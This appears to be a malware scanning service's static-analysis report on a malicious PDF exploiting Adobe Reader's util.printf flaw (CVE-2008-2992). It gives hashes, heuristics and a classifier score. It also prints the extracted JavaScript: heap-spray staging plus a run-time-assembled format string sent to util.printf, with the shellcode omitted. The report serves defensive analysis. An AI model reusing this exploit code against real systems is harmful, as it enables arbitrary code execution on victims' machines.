CVE-2008-2992 — PDF malware analysis

Static analysis result for SHA-256 0bee392eddf81f09…

MALICIOUS

PDF

1.7 KB
First seen: 2026-05-07
MD5: 077b691426a322c020c7cd487fa350ab
SHA-1: 3bec057446384189b5563693ca9f92e6715eaf4e
SHA-256: 0bee392eddf81f0947eec0560440976e439e2dbf8aae2041344832c46cede471
Risk Score: 106

Malware Insights

CVE-2008-2992 · confidence 95%

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains embedded JavaScript that utilizes a heap spray technique, identified as a known exploit for Adobe Reader (CVE-2008-2992). This exploit is designed to achieve arbitrary code execution. The ML classifier strongly supports the malicious nature of this file.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • JavaScript action · low · 2 related findings · PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) · critical · CVE related · PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink util.printf, associated with CVE-2008-2992. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • Embedded JS stream · low · PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: javascript_obj0005_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 5 at offset 0x10F
Size: 2933 bytes
SHA-256: 24453678e814687c165ac4dc7ebb18d55267a1768dc347107db2931a9c19a885
First 1,000 lines of the extracted script
var my_kval = 20000 * 3;
var my_kval1 = 262144;
var my_kval2 = 0x5AA;

// Sled unit, repeated to build the prefix placed in front of the payload
var next = '\u4b4f\u4027';
var Alpha = '';
for (Buffer = 128; Buffer >= 0; --Buffer) Alpha += next;

// The long run of \uXXXX escapes that formed the payload string is omitted here
var html = '[encoded payload string removed]';

// Heap-spray staging: grow a filler string until filler plus payload
// approaches my_kval1 characters, then store my_kval2 copies in an array
Charlie = Alpha + html;
David = next;
Eddie = 10 + 10;
Frank = Eddie + Charlie.length;
while (David.length < Frank) David += David;
Greg = David.substring(0, Frank);
Harry = David.substring(0, David.length - Frank);
do {
    Harry += Greg;
    if ((Harry.length + Frank) >= my_kval1) break;
} while (1);
Ice = new Array();
for (Jack = 0; Jack < my_kval2; Jack++) Ice[Jack] = Harry + Charlie;

// The format string is assembled at run time from 'f.%' and my_kval,
// giving "%60000.60000f", and is passed to the util.printf sink
var source = 35;
source = source - 35;
var Steve = 'f.%';
var Paul = Steve.substring(2,3);
var Mike = Steve.substring(1,2);
var Lisa = Steve.substring(0,1);
var PEBKAC = Paul + my_kval.toString() + Mike + my_kval.toString() + Lisa;
util.printf(PEBKAC, source);